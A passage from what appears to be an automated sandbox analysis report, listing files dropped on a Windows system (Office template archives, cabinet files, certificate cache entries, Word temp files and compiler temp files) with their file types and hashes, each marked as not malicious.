SHA-512:	0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDF380.tmp\pictureorgchart.glox
File Type:	Zip archive data, at least v2.0 to extract
MD5:	06B261C268EB0F2DED02DB137FCA661C
SHA1:	34A2D0626564D3B0072011696974369659C594A2
SHA-256:	879FDDAFC6FEE057A4FB647154917F838A0B5A8B8C5E4B8548EB0B2FA544CCDC
SHA-512:	63192FC20FF796A360DA48ACF5752B5F2A48A30CC55460A954E326E4943FB104558F5087ACD86B2E6BEEFF47BBD3450D26021F82DC46488DA293C43B0D305EE2
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDF77A.tmp\Content.inf
File Type:	data
MD5:	2240CF2315F2EB448CEA6E9CE21B5AC5
SHA1:	46332668E2169E86760CBD975FF6FA9DB5274F43
SHA-256:	0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
SHA-512:	10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDF77A.tmp\rings.glox
File Type:	Zip archive data, at least v2.0 to extract
MD5:	C18DB5B8530E9DD41DAD959CC1E5EC07
SHA1:	163D03E5E22BABCAC0D628A6AAB2E74DB8EACE01
SHA-256:	6264FEC46325523832E3529D5D78974BE7185619C14F075EA381F56B4FAB4B55
SHA-512:	F714D89B146A37B87685F8DDCE7FC5C6B6F45DBE01A2C776A07AE34F5635F8CAF4EB392D04FB5B7E138AA3668068D019916ACED0CB44F2C6E04C6A4EEA0D5116
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDF7F9.tmp\Content.inf
File Type:	data
MD5:	16711B951E1130126E240A6E4CC2E382
SHA1:	8095AA79AEE029FD06428244CA2A6F28408448DB
SHA-256:	855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
SHA-512:	454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDF7F9.tmp\TabbedArc.glox
File Type:	Zip archive data, at least v2.0 to extract
MD5:	70F33CC9425E9D74454206E189BB90E6
SHA1:	EF6136AF9F44C1C1F99BB70CF0EB1C68E83DE20B
SHA-256:	B6796BC0F5CE3661C66C0334D499F52740C40BAF11118C7D743F7C440D479FAF
SHA-512:	66E3FAF64455F537DE732FA85257F1E9764890C62FB1A2AC593F46BBE11398C52B083E980D0CE756F5910C736C3C8F82F92EB32512947DA9B3630C59DF1592C2
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabC1FF.tmp
File Type:	Microsoft Cabinet archive data, 24538 bytes, 2 files
MD5:	97FC1379E3A782891C17254E828C9EEC
SHA1:	E619741F830D1CD72B3C958AD703FD686B04CD6E
SHA-256:	33C2A9F238E778FF3EA3F974AAD00D1695A2C119D8DCD6439989DD8A540DAA1A
SHA-512:	209B9174127F221E0A59C5A831343E182D0F3C0BA810FF29E69B4724038221B2A34071FA32CBE322C4984AF790E79AA673FB4BCE57EFC06DAA9DC45FB190B2D5
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabC924.tmp
File Type:	Microsoft Cabinet archive data, 24860 bytes, 2 files
MD5:	CAE6C5B9FF234878C894DE07B261FFC4
SHA1:	83AE3CA540703B130292B8DBA910FC1CB9D6DB88
SHA-256:	093A33E7621DC7D9DECC37CAC37797BA22BFDC49411B9CA4974DC423AF1CAC5A
SHA-512:	2A87F988442F1DCBC5C9F16F36B1A0651C1C2F31F86C6DEE56AC7D458D2E2451307B3A2C9038DE1CF8BCBC9CFE46E7487BDC32DC99A75828858641F5864B1F68
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabCE94.tmp
File Type:	Microsoft Cabinet archive data, 6458 bytes, 2 files
MD5:	18B7312DA5FC470CAFD295FF25451E11
SHA1:	AC52D5FD7FC3C7C06A5407DE1A5CFED97C8D930A
SHA-256:	D36DDEF6AC391823C0AA256ECA6BBC3651FBF711FB5DC8728DA398DFE6A01222
SHA-512:	C842697FA1C22BF519FBAE9FD4CD38E30D1E0FDB464CE1C1216BCA484810136337C4CDCA8EDFAB97BEBF8B18A21AA54FA4B9CC8956E5445A4C73E6EE7FE1E813
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabD6C5.tmp
File Type:	Microsoft Cabinet archive data, 4535 bytes, 2 files
MD5:	DA31F055F03D0B875041DC3C542D4C22
SHA1:	FA7DB7147DD860A6423C8E40A520F6B5E9546563
SHA-256:	8E6A448A839B3D55E10BDC46BB7C01D00AEC125C3E3F1C12C3A65DB778E94110
SHA-512:	F35687A8EE6CC3BF0E49B9A9E2ABE02F442543C1CD22C3155FBC7B3E39ACE604060CD0465769DC0EEFC85809E85DC6DC97C4E8FD5D082C18261DDFF0618ED77C
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabDE78.tmp
File Type:	Microsoft Cabinet archive data, 4297 bytes, 2 files
MD5:	6714D3D280D09E201DE2FDFA1C3050FD
SHA1:	9D759D746117E8674AF370DA8A4A316AC0E82602
SHA-256:	2DD120ACE189676EB3EE18EF41952A290AB6DE9994878429F002B27627AF5769
SHA-512:	C8085AFDFDCD503A7CF3AE2CAD015CEAAD8EC03A34139349F3815AFA054596E56396E22D3422C9B374C4EF2D6ED94FA24E6BDBABE212998A99A9EFBA5D9895D1
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabE4E3.tmp
File Type:	Microsoft Cabinet archive data, 951860 bytes, 2 files
MD5:	614D34EA8521B9401CA8159C60DE830A
SHA1:	9BB71F5141D5F76374C3C007CF9A6156482EE8DB
SHA-256:	10A253362412A54463F4B1B39582D1A42224EFEC73BB24552E4F460A9232BC82
SHA-512:	0A12C6ACD7711D97F9299BC0F9B7ACC1A0C4FA13CE61122885200C6568071C261178E51CD5F28FEBAF1DCA34A65CBFBB0FC0CC7D5014A23FF626FBF3F341512E
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabEB4D.tmp
File Type:	Microsoft Cabinet archive data, 237999 bytes, 2 files
MD5:	E59350D1B1BBA11DAAFF5319D4AFC34B
SHA1:	F212D121223AA81146519CD6F66AC3B128273CB5
SHA-256:	40DD59F238F00607006D445AD7CF2DFF96D4A4A502A5832588EE93ED6AFBA917
SHA-512:	72CFD6CD34DA32B8FB3DDC5475895EB020E7B78574F5EE56D7F2467D4D07A7211B05ADDB72F674C6C703EDD02E23989D8E6A38BF03E58C71B34334307E509B1E
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabEF95.tmp
File Type:	Microsoft Cabinet archive data, 116201 bytes, 2 files
MD5:	7B7AA4B042FC9586253A38E8DDF52538
SHA1:	4E0A53AF78F3C85D5E7550DD0604F222D5E5DAAD
SHA-256:	86A85F45F9614D049B8E854B5D21BB7A1E820A0940A5BA7082EE0BD883238593
SHA-512:	9E399D2C538741384A670A3180542E0E23B96F0692D6BDD141B813CE11C34AFDC8882CE8D715D78CB2336564E62DADB0A79E555DB7C06AC122E8DA2607588FAE
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabF19B.tmp
File Type:	Microsoft Cabinet archive data, 9673 bytes, 2 files
MD5:	16E40843C461F098E49F53E738E37C34
SHA1:	6D13280BABB22A2A23725BEEE97E369D82D04BB2
SHA-256:	6595204561ACA83ACE7AA010D96108DA7734D872B8589BF3D0A16147AE7E81FB
SHA-512:	82ED0DF4902BF2DB707D40A9E82CA61ACBF5C5E5092AFCB05E1C90E559A5F7B1E31F425EE60548AE88EB5C6F687A3DD9C310DC6D9861FA0800B62E9DD546D497
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabF71B.tmp
File Type:	Microsoft Cabinet archive data, 5431 bytes, 2 files
MD5:	997557A3C9561D9CE0D7B6FD9A1DBD63
SHA1:	EFA3C487335BEF6C8E5AFD2C46194870F50B0198
SHA-256:	0F6B7D1C0C2BE4C8B4A865FF1A64A0D7B497E3B293777F0F5A8E870814E24F76
SHA-512:	45C9964E08EE79A1D48603B38328B2860B4E8B6500E4682E17803A30B46A6E31296D4E41F5DC449207CA5C9D2AA6BB7912ED92FC042EA70CC7E26C27446A4FB3
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\cabF78A.tmp
File Type:	Microsoft Cabinet archive data, 3921 bytes, 2 files
MD5:	A6F505E4F6DEB9C788E1C2BF5BB4E0FE
SHA1:	706C65920ED465A89561CC3F6AC871EA50D0E419
SHA-256:	D0C750D6D74B3BA5A3915361FD31046151ECB216FA9FBA30C2D38D6000EC6187
SHA-512:	A87DF1566CFFB8655C5E68DB71B615AE2BA4F37657503968C8D8E9C9D15E61176251289BB24DF0D54614EFE585B67D1EA794FE538D5F83E79F253D758EEE6AFC
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
File Type:	Microsoft Cabinet archive data, 6564 bytes, 1 file
MD5:	16E8E953C65D610C3BFC595240F3F5B7
SHA1:	231A802E6FF1FAE42F2B12561FFF2767D473210B
SHA-256:	048846ED8ED185A26394ADEB3F63274D1029BBD59CFFA8E73A4EF8B19456DE1D
SHA-512:	8CF223F68CD118BE6BEF746D4CCEF2BC293E7E0F44630F7B1A799280C255622CC75A8313D7918C95F5D17765CCB90D50D08E1224EC1BE33A8381780D3C8D068C
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\696F3DE637E6DE85B458996D49D759AD
File Type:	data
MD5:	3CB0F2B6D626FE5C8EC19118DD7104C6
SHA1:	5E83C9A2A9C9D6649F660BD66F690EF1DABDB07D
SHA-256:	1EBD5D6A60FEE6A5EE51E918E9B85842EF3B4DC9FE105646E5973450E3BA26A2
SHA-512:	F241E997BF72DF2AC910262A505D76FF48BA887D8B1D6D748FF0FEFE7251E228D09DA009BD9FF34D50BA6485D70CF4024CDD99705DCD250FDF962A89C41DFAD1
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
File Type:	data
MD5:	456804C5A52489789DAFF0EF6D1CE739
SHA1:	0275581C19E0C6FE01CB5A67C95BED6E7426AB17
SHA-256:	BF2729E37AF5612DB8BFB5550501E54866AC45DB5F4460FEED003CD4F8D8C7D4
SHA-512:	C29DCD4BC51FB12609B816E9B57045B9D8F93C1167303C0CFDC6CB21F2997F32E2F7A6DD33179A088552D041EB730E5358BBEC50986EFFE55F94BBA11FAB53D2
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7396C420A8E1BC1DA97F1AF0D10BAD21
File Type:	data
MD5:	AF661FBD5CB58C268E31EAE08385911B
SHA1:	54FEF97B7DB5FF5D0B11573305250409D1D1EFBA
SHA-256:	8EE1B84D71D0FD87B1BEF8A7D60312A61A7905EBBB1A7A1ECB97795219F9FB51
SHA-512:	6D9C0A94E1439E2C63903E21F6C449BC075AB8353650334F31980D93EA9221B5363FAD8B3D978AC1BDA99457F9783167EC3AAF0F351DA15EA352517AC1DA00D9
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F
File Type:	data
MD5:	BB187391EA8840CDC7BE9F32058C1BE8
SHA1:	EE94BE48A638475CD57AB3A593EF57125434F064
SHA-256:	B3D9E9C4440AA97BC8AF05BDF92E2F04D6F1823C1F14FF2F7050E4C7FE4891EE
SHA-512:	D5C4F2EC0B9BE86C6027C5FECFE795A75F29BBF52D0D96FEE76417DC5E4C58230217352E9D18E0D34582F193034775A6BF62960772FE4534EC251F1BFD15B013
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F90F18257CBB4D84216AC1E1F3BB2C76
File Type:	data
MD5:	4822033E3D7EB806A381A27B1BA25456
SHA1:	FEA2F18C4D1F5F070D39FECF6D50B3CFE39BA4CF
SHA-256:	2AD8A354DFAAE3F0A4D932975CC81D09A2DDBA2F88ABE93761065C6067AF0A70
SHA-512:	63F53C9518B3A8843A91C4145FDA8986C0028426B7082456DFD941AD93B9B8EDE34B9186072867BD6D668023F75B4847DC82DC2A7A6362A2FC98060A34D1E0F4
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
File Type:	data
MD5:	B30504496F3D6A064933BBCC851CDAEF
SHA1:	F8C67B1C0958AD490CADA452B0FAE69DEF63DFEA
SHA-256:	B65D0AA672DDC6C20D20283A084BABDC3AEB8F446962302035EF54DA297409D8
SHA-512:	4BCAA9897825A1C73DF4893BA2126A18439A335394CAB201D746BCA9D6DDE8CFDF3D10A14A45AC8013A0CC99459DBC72891A9A345E711A97F5CED76696B83612
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\696F3DE637E6DE85B458996D49D759AD
File Type:	data
MD5:	C9B3AFC8F06737F6263682A30D5CFF9A
SHA1:	28DBC15EE4665D39435772532602BDA96502C3C9
SHA-256:	199BBA46069BBB00670D3FD693421A9798A1236C5AF995E5595F05F8B09A6B43
SHA-512:	3BB89879466D458F6411FF6B06EA54189FBF121CF8E4FB74009ED076375958ED08A42464F2FB9C35FDEC36EB30CA503C71A198609F55A3C4FA54A17442CD8C06
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
File Type:	data
MD5:	2009C7E29B620DD851C7466643C92B6E
SHA1:	C944CA7FFFBD6B46743270A36ECD485E2522B171
SHA-256:	002FB47BB21986F96C01B753C82568A8BE77F6D5D8A977255BD63FFDF8C3012F
SHA-512:	C3BA8130F74C6EE5367936140D851AF8F08FB166C20248E42DAD7D0B8655D58E8FB0DFD2753A9F35F3C1E49C3EDA2B2B126B832A670BB4B3D67954618786670B
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7396C420A8E1BC1DA97F1AF0D10BAD21
File Type:	data
MD5:	808CEA8D3F4A425B81DF86C85835D472
SHA1:	19153ED7DFC969292248D6C927663C773DE98D9C
SHA-256:	D39F5B74DF5E3E1FAD3E18CD887D2AB705879B26826220815C444524B7300531
SHA-512:	8A2A354EC95175819E0AF8C0E780B1596DAEF8749108FAE4E8CD1A6963EA75EEF463922E483AF1D6C4E5CA3E684E8015593566AF5937F71E5D436C70FDBDA15E
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F
File Type:	data
MD5:	95CBB955C5ACBA8EF88DC5BD0C177C43
SHA1:	0AD9ABAEECE648961170B27B34C5A1F53BCFA530
SHA-256:	269D449B902F64C4B6695B1D92E518930F32D8635B14BAC41EC449C909E87B33
SHA-512:	57C19CB0477A3BFE05AB381705E0CD2A300E9EC65652F34DC0BA33A41C66BAAAD651CFCD808961D9E4E3EE944F991B6076C09F62BED768C89ADD5D00238C6BD3
Malicious:	false

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F90F18257CBB4D84216AC1E1F3BB2C76
File Type:	data
MD5:	15C940C3B5868C5EBBF124A4BA0FD030
SHA1:	ECDE17A337AF467A09C570087BE46166A26F6BD7
SHA-256:	F5EEE3F4C286885BE3AA09619277383CA0ACA7E6607AAB4A7DE54E7F31158D34
SHA-512:	2C5754D394E562ABBAA06C9D8299343B60A5BC04436A15DCE06E238F65983633CF21421F32D3D188BFAFE69FCABE0F40094FBD5938CFB627414BDE50F28CEBAF
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.sig
File Type:	data
MD5:	C703A12E7B394CA30932792237C227EE
SHA1:	D20F3ABA970E682AD9AE52E7A17E7A2B4620C5A7
SHA-256:	9A0585838C814EB35659718EB90AF9807528F30C5D09D5B44D8A2ECB423AAB4A
SHA-512:	8EE0B5BB7CF4089131D7E3A38ED2769AE81F77FEA1E87CE2F2F5DD0BC04402175A7551E3726320DBFBD8F50FA36A4C5C687B71699B5CCCFD737BB106A51CE8F6
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.xml
File Type:	XML document text
MD5:	9E632D66E7F34A356230CA488FA973EF
SHA1:	6BF7065036B9C5263B224EFDA92F82FC12DC6901
SHA-256:	EEDC34698F27FF0D0D30CB26D18CC0AAB26D0A397E3E2FA7A4AC80FF53976EDA
SHA-512:	CCD77C7135DA5A1FC753131E7115C42C6D3B6C658A5F3ADD9BEE1F1CCB656A3F2ACC765113281011FEAF19A93967AACC56B5C31BE298F5B925A0B0A0D805E873
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\config14[1].xml
File Type:	XML document text
MD5:	9E632D66E7F34A356230CA488FA973EF
SHA1:	6BF7065036B9C5263B224EFDA92F82FC12DC6901
SHA-256:	EEDC34698F27FF0D0D30CB26D18CC0AAB26D0A397E3E2FA7A4AC80FF53976EDA
SHA-512:	CCD77C7135DA5A1FC753131E7115C42C6D3B6C658A5F3ADD9BEE1F1CCB656A3F2ACC765113281011FEAF19A93967AACC56B5C31BE298F5B925A0B0A0D805E873
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\gallery[1].xml
File Type:	XML document text
MD5:	22FFC2C6DAF599D2EF98DCD3F227FD85
SHA1:	0F9F3C8758F95DA34F4927D1CC99537265A56C93
SHA-256:	A94B01A7C798B22E359E0927B8A90080B1B903355D792AB87144BB858156AF89
SHA-512:	08E4AA002A77F3AAC4C05F4C85A4745CAAB3E811885DD19AA54027DB6A4F6F1CD1166771F8AFDFFE6FEC2616E2CC86336F86326DCF6A87889BF9D9A5523EBCE8
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01790490[1].cab
File Type:	Microsoft Cabinet archive data, 116201 bytes, 2 files
MD5:	7B7AA4B042FC9586253A38E8DDF52538
SHA1:	4E0A53AF78F3C85D5E7550DD0604F222D5E5DAAD
SHA-256:	86A85F45F9614D049B8E854B5D21BB7A1E820A0940A5BA7082EE0BD883238593
SHA-512:	9E399D2C538741384A670A3180542E0E23B96F0692D6BDD141B813CE11C34AFDC8882CE8D715D78CB2336564E62DADB0A79E555DB7C06AC122E8DA2607588FAE
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01790491[1].cab
File Type:	Microsoft Cabinet archive data, 237999 bytes, 2 files
MD5:	E59350D1B1BBA11DAAFF5319D4AFC34B
SHA1:	F212D121223AA81146519CD6F66AC3B128273CB5
SHA-256:	40DD59F238F00607006D445AD7CF2DFF96D4A4A502A5832588EE93ED6AFBA917
SHA-512:	72CFD6CD34DA32B8FB3DDC5475895EB020E7B78574F5EE56D7F2467D4D07A7211B05ADDB72F674C6C703EDD02E23989D8E6A38BF03E58C71B34334307E509B1E
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01790492[1].cab
File Type:	Microsoft Cabinet archive data, 951860 bytes, 2 files
MD5:	614D34EA8521B9401CA8159C60DE830A
SHA1:	9BB71F5141D5F76374C3C007CF9A6156482EE8DB
SHA-256:	10A253362412A54463F4B1B39582D1A42224EFEC73BB24552E4F460A9232BC82
SHA-512:	0A12C6ACD7711D97F9299BC0F9B7ACC1A0C4FA13CE61122885200C6568071C261178E51CD5F28FEBAF1DCA34A65CBFBB0FC0CC7D5014A23FF626FBF3F341512E
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01793058[1].cab
File Type:	Microsoft Cabinet archive data, 24538 bytes, 2 files
MD5:	97FC1379E3A782891C17254E828C9EEC
SHA1:	E619741F830D1CD72B3C958AD703FD686B04CD6E
SHA-256:	33C2A9F238E778FF3EA3F974AAD00D1695A2C119D8DCD6439989DD8A540DAA1A
SHA-512:	209B9174127F221E0A59C5A831343E182D0F3C0BA810FF29E69B4724038221B2A34071FA32CBE322C4984AF790E79AA673FB4BCE57EFC06DAA9DC45FB190B2D5
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01793064[1].cab
File Type:	Microsoft Cabinet archive data, 24860 bytes, 2 files
MD5:	CAE6C5B9FF234878C894DE07B261FFC4
SHA1:	83AE3CA540703B130292B8DBA910FC1CB9D6DB88
SHA-256:	093A33E7621DC7D9DECC37CAC37797BA22BFDC49411B9CA4974DC423AF1CAC5A
SHA-512:	2A87F988442F1DCBC5C9F16F36B1A0651C1C2F31F86C6DEE56AC7D458D2E2451307B3A2C9038DE1CF8BCBC9CFE46E7487BDC32DC99A75828858641F5864B1F68
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01793888[1].cab
File Type:	Microsoft Cabinet archive data, 6458 bytes, 2 files
MD5:	18B7312DA5FC470CAFD295FF25451E11
SHA1:	AC52D5FD7FC3C7C06A5407DE1A5CFED97C8D930A
SHA-256:	D36DDEF6AC391823C0AA256ECA6BBC3651FBF711FB5DC8728DA398DFE6A01222
SHA-512:	C842697FA1C22BF519FBAE9FD4CD38E30D1E0FDB464CE1C1216BCA484810136337C4CDCA8EDFAB97BEBF8B18A21AA54FA4B9CC8956E5445A4C73E6EE7FE1E813
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01793889[1].cab
File Type:	Microsoft Cabinet archive data, 4297 bytes, 2 files
MD5:	6714D3D280D09E201DE2FDFA1C3050FD
SHA1:	9D759D746117E8674AF370DA8A4A316AC0E82602
SHA-256:	2DD120ACE189676EB3EE18EF41952A290AB6DE9994878429F002B27627AF5769
SHA-512:	C8085AFDFDCD503A7CF3AE2CAD015CEAAD8EC03A34139349F3815AFA054596E56396E22D3422C9B374C4EF2D6ED94FA24E6BDBABE212998A99A9EFBA5D9895D1
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01793890[1].cab
File Type:	Microsoft Cabinet archive data, 4535 bytes, 2 files
MD5:	DA31F055F03D0B875041DC3C542D4C22
SHA1:	FA7DB7147DD860A6423C8E40A520F6B5E9546563
SHA-256:	8E6A448A839B3D55E10BDC46BB7C01D00AEC125C3E3F1C12C3A65DB778E94110
SHA-512:	F35687A8EE6CC3BF0E49B9A9E2ABE02F442543C1CD22C3155FBC7B3E39ACE604060CD0465769DC0EEFC85809E85DC6DC97C4E8FD5D082C18261DDFF0618ED77C
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01793891[1].cab
File Type:	Microsoft Cabinet archive data, 9673 bytes, 2 files
MD5:	16E40843C461F098E49F53E738E37C34
SHA1:	6D13280BABB22A2A23725BEEE97E369D82D04BB2
SHA-256:	6595204561ACA83ACE7AA010D96108DA7734D872B8589BF3D0A16147AE7E81FB
SHA-512:	82ED0DF4902BF2DB707D40A9E82CA61ACBF5C5E5092AFCB05E1C90E559A5F7B1E31F425EE60548AE88EB5C6F687A3DD9C310DC6D9861FA0800B62E9DD546D497
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01793892[1].cab
File Type:	Microsoft Cabinet archive data, 5431 bytes, 2 files
MD5:	997557A3C9561D9CE0D7B6FD9A1DBD63
SHA1:	EFA3C487335BEF6C8E5AFD2C46194870F50B0198
SHA-256:	0F6B7D1C0C2BE4C8B4A865FF1A64A0D7B497E3B293777F0F5A8E870814E24F76
SHA-512:	45C9964E08EE79A1D48603B38328B2860B4E8B6500E4682E17803A30B46A6E31296D4E41F5DC449207CA5C9D2AA6BB7912ED92FC042EA70CC7E26C27446A4FB3
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3HOVZAYJ\tp01793893[1].cab
File Type:	Microsoft Cabinet archive data, 3921 bytes, 2 files
MD5:	A6F505E4F6DEB9C788E1C2BF5BB4E0FE
SHA1:	706C65920ED465A89561CC3F6AC871EA50D0E419
SHA-256:	D0C750D6D74B3BA5A3915361FD31046151ECB216FA9FBA30C2D38D6000EC6187
SHA-512:	A87DF1566CFFB8655C5E68DB71B615AE2BA4F37657503968C8D8E9C9D15E61176251289BB24DF0D54614EFE585B67D1EA794FE538D5F83E79F253D758EEE6AFC
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GNNUVO51\word[1].db
File Type:	data
MD5:	AEEA5B9284323CBBE0230E13C9EBAC5A
SHA1:	8A2D6C8BA5B8083C26FABDA380C720C8D6958C21
SHA-256:	F3C49AA70494B895208B167EBA9AEBF1B4E99535E82AE8B11316D9F3054B9351
SHA-512:	C760DF3E2E8F4841D551CC35325B9DF6D88D360240A61F79D89196DCFD3AF4386A9767D230D9D1FFEA0559843C94DB39CA711B4DE0F62AF108F45BA5E9B35362
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8F3A735.wmf
File Type:	ms-windows metafont .wmf
MD5:	07FFEFF17A8A1A1209AB3C2690D569D4
SHA1:	37CB513FABDDCDBBAA2E7296B31A4BC9832E1B01
SHA-256:	57CFA30BB860B95B7012ED62427025959B671D270AAF67FC406FBC3C4F3C48D4
SHA-512:	743591E7BFE9936EEE057C9D1769595D48C90BA28057D8EBD0F7299B8FCACD7B8FA50AF30BD0B8B6E09F77ADE16B47D6F0ABB079D60E975443A57C514099AD86
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD2B9BB2.wmf
File Type:	ms-windows metafont .wmf
MD5:	904DC9D6A003159E16D17F02C3A02F66
SHA1:	CCE6C4A3B018E70C10E666622D3980D85D738322
SHA-256:	83B7A25C2ADB74FEF46EA1EBF038E72EA175A66C9553C1E0AC42096C70A1A412
SHA-512:	38C7C6FEE1EE39585B721A88B38FE15C30204ADB37659970F060A91C6463D4C7FE02A1B676F9761BEC298495A6C49708F00254FDF08AF9988F6DDEC8262F9318
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A78BB27D-4691-4283-9E96-F5F4142F84CD}.tmp
File Type:	data
MD5:	B6FF836AB9E44E948CD5889E240A4B48
SHA1:	2FA457A3ACBBC60AD849C0BAE6F4CE6D210C9D82
SHA-256:	56CF772ED77BF3C07643CA15FDA26B8833C3A1BE3958F112593B62BBF7B29E0C
SHA-512:	FDD2117B9D9B2148A33AD77DF2DFC321BFC8D74483F94CE5080A8D307E4D6717F09A4D4EFE3A56750B69F2455E98500A361D3F2987604368026467313B86BF8D
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA89AB42-BC10-49E7-A30A-A621C2ADD45C}.tmp
File Type:	data
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false

C:\Users\user\AppData\Local\Temp\h39sf8po.0.cs
File Type:	UTF-8 Unicode (with BOM) C++ program text, with CRLF, LF line terminators
MD5:	E4509830183B8A3D6D8776BD8F10431E
SHA1:	8727666C97DCF3980AA1C0B24614F0CB0F0C1941
SHA-256:	F2F479475A690223FE6F7F6F422EC4C3FFB50CF9518063FC8E78CF656E7F5745
SHA-512:	A45365CE2C9503075816650CEB56AB0A468C8C63D1B8BC812B1320883533E5748198121BA9BA524A4285D921E05E24F001AEA3D0BD98053FFF87746433892225
Malicious:	false

C:\Users\user\AppData\Local\Temp\h39sf8po.cmdline
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
MD5:	CD0BC89BEA3D6B81E4C5BCCEDED91276
SHA1:	0766231DE298AE5F70805D192D8EE24DD90A1785
SHA-256:	16A55AAE477CA567C1A084B9BEB84E81A3DEAEDEEC459E2C547485DE4A772996
SHA-512:	525C0AA69D0FD49220B8EEC2173E2F18722315657FD69D64AB42F8CEB86A60DAAC5C5B3BF3620DF505F39753EAC7E51A97685617E5214AE98F13A7FF601E4A64
Malicious:	false

C:\Users\user\AppData\Local\Temp\h39sf8po.out
File Type:	ASCII text, with CRLF line terminators
MD5:	182738883BFDFB548627BEC18305C7EE
SHA1:	FD5A8D41B96844985C0DC21116CFA689CED8AABE
SHA-256:	5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622
